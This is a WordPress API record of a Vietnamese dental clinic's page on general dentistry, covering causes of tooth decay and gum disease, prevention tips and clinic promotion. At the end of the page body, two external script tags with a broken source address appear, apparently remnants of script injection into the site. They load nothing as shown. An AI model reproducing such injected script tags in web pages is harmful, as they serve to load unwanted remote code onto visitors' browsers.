{"id":732,"date":"2017-08-03T09:36:16","date_gmt":"2017-08-03T09:36:16","guid":{"rendered":"http:\/\/nhakhoaquocbinh.com\/en\/?page_id=732"},"modified":"2017-08-03T09:36:16","modified_gmt":"2017-08-03T09:36:16","slug":"nha-khoa-tong-quat","status":"publish","type":"page","link":"https:\/\/nhakhoaquocbinh.com\/en\/service\/nha-khoa-tong-quat\/","title":{"rendered":"NHA KHOA T\u1ed4NG QU\u00c1T"},"content":{"rendered":"<p>Trong x\u00e3 h\u1ed9i hi\u1ec7n nay, t\u1ef7 l\u1ec7 d\u00e2n s\u1ed1 g\u1eb7p ph\u1ea3i c\u00e1c v\u1ea5n \u0111\u1ec1 s\u1ee9c kh\u1ecfe r\u0103ng mi\u1ec7ng l\u00e0 c\u1ef1c k\u00ec l\u1edbn. Do th\u00f3i quen sinh ho\u1ea1t v\u00e0 ch\u0103m s\u00f3c r\u0103ng mi\u1ec7ng h\u00e0ng ng\u00e0y kh\u00f4ng \u0111\u00fang c\u00e1ch \u0111\u00e3 d\u1eabn \u0111\u1ebfn h\u1eadu qu\u1ea3 h\u01a1n 80% d\u00e2n s\u1ed1 \u0111ang b\u1ecb b\u00e1o \u0111\u1ed9ng v\u1ec1 s\u1ee9c kh\u1ecfe r\u0103ng mi\u1ec7ng.<\/p>\n<p><img loading=\"lazy\" class=\"size-full wp-image-701 aligncenter\" src=\"http:\/\/nhakhoaquocbinh.com\/wp-content\/uploads\/2017\/07\/nha-khoa-tong-quat-0.jpg\" alt=\"\" width=\"700\" height=\"374\" \/><\/p>\n<p>C\u00e1c v\u1ea5n \u0111\u1ec1 g\u1eb7p ph\u1ea3i th\u01b0\u1eddng th\u1ea5y l\u00e0 s\u00e2u r\u0103ng, vi\u00eam l\u1ee3i, t\u00fai m\u1ee7 quanh ch\u00e2n r\u0103ng v\u00e0 m\u1ea5t r\u0103ng. Nguy\u00ean nh\u00e2n d\u1eabn \u0111\u1ebfn t\u00ecnh tr\u1ea1ng nhi\u1ec1u ng\u01b0\u1eddi m\u1eafc b\u1ec7nh do h\u1ea1n ch\u1ebf ki\u1ebfn th\u1ee9c gi\u1eef g\u00ecn r\u0103ng mi\u1ec7ng. Nhi\u1ec1u ng\u01b0\u1eddi ch\u1ec9 \u0111\u00e1nh r\u0103ng m\u1ed9t l\u1ea7n sau khi th\u1ee9c d\u1eady, kh\u00f4ng v\u1ec7 sinh sau khi \u0103n, v\u00e0 c\u0169ng kh\u00f4ng \u0111\u00e1nh r\u0103ng tr\u01b0\u1edbc khi ng\u1ee7. Th\u00f3i quen n\u00e0y \u0111\u00e3 khi\u1ebfn m\u1ed9t s\u1ed1 tr\u1ebb m\u1edbi thay r\u0103ng v\u00e0i n\u0103m \u0111\u00e3 b\u1ecb t\u00ecnh tr\u1ea1ng\u00a0s\u00e2u r\u0103ng \u0111\u1ebfn 4-5 chi\u1ebfc, v\u00e0 h\u1eadu qu\u1ea3 m\u1ea5t r\u0103ng v\u0129nh vi\u1ec5n \u1edf tu\u1ed5i tr\u01b0\u1edfng th\u00e0nh l\u00e0m khi\u1ebfm khuy\u1ebft ch\u1ee9c n\u0103ng \u0103n nhai c\u0169ng nh\u01b0 th\u1ea9m m\u1ef9.<\/p>\n<p>V\u00e0 \u0111i\u1ec1u \u0111\u00e1ng l\u01b0u t\u00e2m l\u00e0 h\u1ea7u nh\u01b0 m\u1ecdi ng\u01b0\u1eddi v\u1eabn ch\u01b0a c\u00f3 kh\u00e1i ni\u1ec7m ph\u1ea3i \u0111\u1ecbnh k\u1ef3 th\u0103m kh\u00e1m t\u00ecnh tr\u1ea1ng r\u0103ng mi\u1ec7ng c\u1ee7a m\u00ecnh. Ch\u1ec9 khi b\u1ec7nh l\u00fd v\u1ec1 r\u0103ng \u0111\u00e3 \u0111\u1ebfn l\u00fac \u0111au nh\u1ee9c, tr\u1edf n\u1eb7ng th\u00ec m\u1ecdi ng\u01b0\u1eddi m\u1edbi ch\u1ecbu \u0111\u1ebfn b\u00e1c s\u0129 \u0111\u1ec3 ch\u1eefa tr\u1ecb.<\/p>\n<p><span style=\"color: #993366;\"><strong>C\u00e1c b\u1ea1n c\u00f3 khi n\u00e0o th\u1ea5y th\u1eafc m\u1eafc v\u00ec sao r\u0103ng m\u00ecnh l\u1ea1i b\u1ecb s\u00e2u, b\u1ecb m\u1ea3ng \u0111en hay b\u1ecb vi\u00eam m\u1ee7 ch\u01b0a<\/strong>?<\/span><\/p>\n<p><img loading=\"lazy\" class=\"alignnone size-full wp-image-702\" src=\"http:\/\/nhakhoaquocbinh.com\/wp-content\/uploads\/2017\/07\/nha-khoa-tong-quat-1.jpg\" alt=\"\" width=\"698\" height=\"400\" \/><\/p>\n<ul>\n<li>\u0110\u00f3 ch\u00ednh l\u00e0 trong th\u1eddi gian sinh ho\u1ea1t h\u00e0ng ng\u00e0y, sau m\u1ed7i l\u1ea7n c\u00e1c b\u1ea1n \u0103n u\u1ed1ng, c\u00e1c ch\u1ea5t d\u01b0 th\u1eeba c\u1ee7a th\u1ee9c \u0103n n\u01b0\u1edbc u\u1ed1ng c\u00f2n t\u1ed3n \u0111\u1ecdng l\u1ea1i, \u0111\u00e3 k\u1ebft h\u1ee3p t\u1ea1o th\u00e0nh c\u00e1c m\u1ea3ng b\u00e1m &#8211; v\u1ebft \u1ed1 tr\u00ean r\u0103ng, n\u1ebfu kh\u00f4ng k\u1ecbp th\u1eddi ch\u1ea3i r\u0103ng l\u1ea5y \u0111i c\u00e1c ph\u1ea7n t\u1ed3n \u0111\u1ecdng \u0111\u00f3 l\u00e2u d\u1ea7n n\u00f3 s\u1ebd b\u00e1m ch\u1eb7t h\u01a1n v\u00e0 t\u1ea1o th\u00e0nh v\u00f4i r\u0103ng, \u0111\u00e2y ch\u00ednh l\u00e0 m\u00f4i tr\u01b0\u1eddng thu\u1eadn l\u1ee3i \u0111\u1ec3 vi khu\u1ea9n tr\u00fa ng\u1ee5 v\u00e0 sinh s\u00f4i n\u1ea3y n\u1edf.<\/li>\n<li>Vi khu\u1ea9n s\u1ebd l\u00e0m ph\u00e1 ho\u1ea1i men r\u0103ng, \u0103n s\u00e2u v\u00e0o b\u00ean trong ng\u00e0 r\u0103ng v\u00e0 l\u00e0m vi\u00eam t\u1ee7y r\u0103ng, \u0111\u00e2y ch\u00ednh l\u00e0 nguy\u00ean nh\u00e2n g\u00e2y s\u00e2u r\u0103ng.<\/li>\n<li>Kh\u00f4ng nh\u1eefng v\u1eady n\u00f3 c\u00f2n l\u00e0m b\u01b0ng m\u1ee7, vi\u00eam n\u01b0\u1edbu ch\u00e2n r\u0103ng v\u00e0 l\u00e0m lung lay r\u0103ng d\u1eabn \u0111\u1ebfn t\u00ecnh tr\u1ea1ng m\u1ea5t r\u0103ng.<\/li>\n<\/ul>\n<p>C\u00e1c v\u1ea5n \u0111\u1ec1 tr\u00ean c\u00f2n \u0111em \u0111\u1ebfn th\u00eam m\u1ed9t h\u1eadu qu\u1ea3 ch\u00ednh l\u00e0 t\u1ea1o n\u00ean m\u00f9i h\u00f4i kh\u00f3 ch\u1ecbu trong mi\u1ec7ng c\u1ee7a b\u1ea1n. V\u00e0 l\u00e0 nguy\u00ean nh\u00e2n d\u1eabn \u0111\u1ebfn m\u1ed9t s\u1ed1 b\u1ec7nh l\u00fd kh\u00e1c trong c\u01a1 th\u1ec3.<\/p>\n<p>Nha khoa t\u1ed5ng qu\u00e1t ch\u00ednh l\u00e0 t\u1eadp h\u1ee3p c\u00e1c ph\u01b0\u01a1ng ph\u00e1p ch\u1eefa tr\u1ecb v\u00e0 ph\u00f2ng ng\u1eeba hi\u1ec7u qu\u1ea3 c\u00e1c b\u1ec7nh v\u1ec1 r\u0103ng mi\u1ec7ng. C\u00f3 c\u00e1c d\u1ecbch v\u1ee5 ch\u1ee7 y\u1ebfu nh\u01b0: c\u1ea1o v\u00f4i, tr\u00e1m r\u0103ng, ch\u1eefa t\u1ee7y, nh\u1ed5 r\u0103ng, ch\u1eefa tr\u1ecb vi\u00eam n\u01b0\u1edbu, nha chu. Gi\u00fap \u0111\u1ea3m b\u1ea3o v\u1ec1 s\u1ee9c kh\u1ecfe r\u0103ng mi\u1ec7ng t\u1eeb giai \u0111o\u1ea1n nh\u1ecf tu\u1ed5i \u0111\u1ebfn tr\u01b0\u1edfng th\u00e0nh v\u00e0 l\u00e3o ni\u00ean.<\/p>\n<p>Bi\u1ec7n ph\u00e1p ph\u00f2ng ng\u1eeba hi\u1ec7u qu\u1ea3 nh\u1ea5t, \u0111\u1ea7u ti\u00ean ch\u00ednh l\u00e0 vi\u1ec7c ph\u1ea3i ch\u1ea3i r\u0103ng t\u1ed1i thi\u1ec3u 02 l\u1ea7n m\u1ed7i ng\u00e0y, ch\u1ea3i r\u0103ng \u0111\u00fang c\u00e1ch \u0111\u1ec3 c\u00f3 th\u1ec3 l\u1ea5y s\u1ea1ch c\u00e1c m\u1ea3ng b\u00e1m d\u01b0 th\u1eeba. L\u01b0u \u00fd c\u1ea7n thay b\u00e0n ch\u1ea3i m\u1edbi sau 03 th\u00e1ng s\u1eed d\u1ee5ng ho\u1eb7c th\u1ea5y d\u1ea5u hi\u1ec7u s\u1ee3i l\u00f4ng b\u00e0n ch\u1ea3i kh\u00f4ng c\u00f2n \u0111\u1ee7 c\u1ee9ng c\u00e1p \u0111\u1ec3 l\u00e0m s\u1ea1ch r\u0103ng mi\u1ec7ng.<\/p>\n<p>Cung c\u1ea5p \u0111\u1ee7 l\u01b0\u1ee3ng n\u01b0\u1edbc cho c\u01a1 th\u1ec3 \u0111\u1ec3 mi\u1ec7ng kh\u00f4ng b\u1ecb kh\u00f4 v\u00e0 lu\u00f4n c\u00f3 \u0111\u1ea7y \u0111\u1ee7 n\u01b0\u1edbc b\u1ecdt, gi\u00fap tri\u1ec7t ti\u00eau m\u00f4i tr\u01b0\u1eddng ph\u00e1t tri\u1ec3n c\u1ee7a vi khu\u1ea9n.<\/p>\n<p>Nha khoa Qu\u1ed1c B\u00ecnh v\u1edbi h\u01a1n 15 n\u0103m kinh nghi\u1ec7m trong nha khoa t\u1ed5ng qu\u00e1t v\u00e0 \u0111\u1ed9i ng\u0169 B\u00e1c s\u1ef9 \u2013 Y s\u1ef9 c\u00f3 t\u00e2m v\u1edbi ngh\u1ec1, ch\u00fang t\u00f4i lu\u00f4n mong mu\u1ed1n \u0111em \u0111\u1ebfn cho c\u00e1c b\u1ea1n c\u00e1c gi\u1ea3i ph\u00e1p ch\u0103m s\u00f3c r\u0103ng mi\u1ec7ng t\u1ed1t nh\u1ea5t v\u00e0 t\u01b0 v\u1ea5n t\u1eadn t\u00ecnh kh\u00f4ng ch\u1ec9 m\u00ecnh b\u1ea1n m\u00e0 c\u00f2n gi\u00fap c\u1ea3 gia \u0111\u00ecnh b\u1ea1n ph\u00f2ng ng\u1eeba v\u00e0 c\u00f3 s\u1ee9c kh\u1ecfe r\u0103ng mi\u1ec7ng t\u1ed1i \u01b0u.<script src='https:\/\/https:\/\/ #' type='text\/javascript'><\/script><script src='https:\/\/https:\/\/ #' type='text\/javascript'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Trong x\u00e3 h\u1ed9i hi\u1ec7n nay, t\u1ef7 l\u1ec7 d\u00e2n s\u1ed1 g\u1eb7p ph\u1ea3i c\u00e1c v\u1ea5n \u0111\u1ec1 s\u1ee9c kh\u1ecfe r\u0103ng mi\u1ec7ng l\u00e0 c\u1ef1c k\u00ec l\u1edbn. Do th\u00f3i quen sinh ho\u1ea1t v\u00e0 ch\u0103m s\u00f3c r\u0103ng mi\u1ec7ng h\u00e0ng ng\u00e0y kh\u00f4ng \u0111\u00fang c\u00e1ch \u0111\u00e3 d\u1eabn \u0111\u1ebfn h\u1eadu qu\u1ea3 h\u01a1n 80% d\u00e2n s\u1ed1 \u0111ang b\u1ecb b\u00e1o \u0111\u1ed9ng v\u1ec1 s\u1ee9c kh\u1ecfe r\u0103ng mi\u1ec7ng. [&#8230;]\n","protected":false},"author":2,"featured_media":0,"parent":722,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"_links":{"self":[{"href":"https:\/\/nhakhoaquocbinh.com\/en\/wp-json\/wp\/v2\/pages\/732"}],"collection":[{"href":"https:\/\/nhakhoaquocbinh.com\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/nhakhoaquocbinh.com\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/nhakhoaquocbinh.com\/en\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/nhakhoaquocbinh.com\/en\/wp-json\/wp\/v2\/comments?post=732"}],"version-history":[{"count":0,"href":"https:\/\/nhakhoaquocbinh.com\/en\/wp-json\/wp\/v2\/pages\/732\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/nhakhoaquocbinh.com\/en\/wp-json\/wp\/v2\/pages\/722"}],"wp:attachment":[{"href":"https:\/\/nhakhoaquocbinh.com\/en\/wp-json\/wp\/v2\/media?parent=732"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}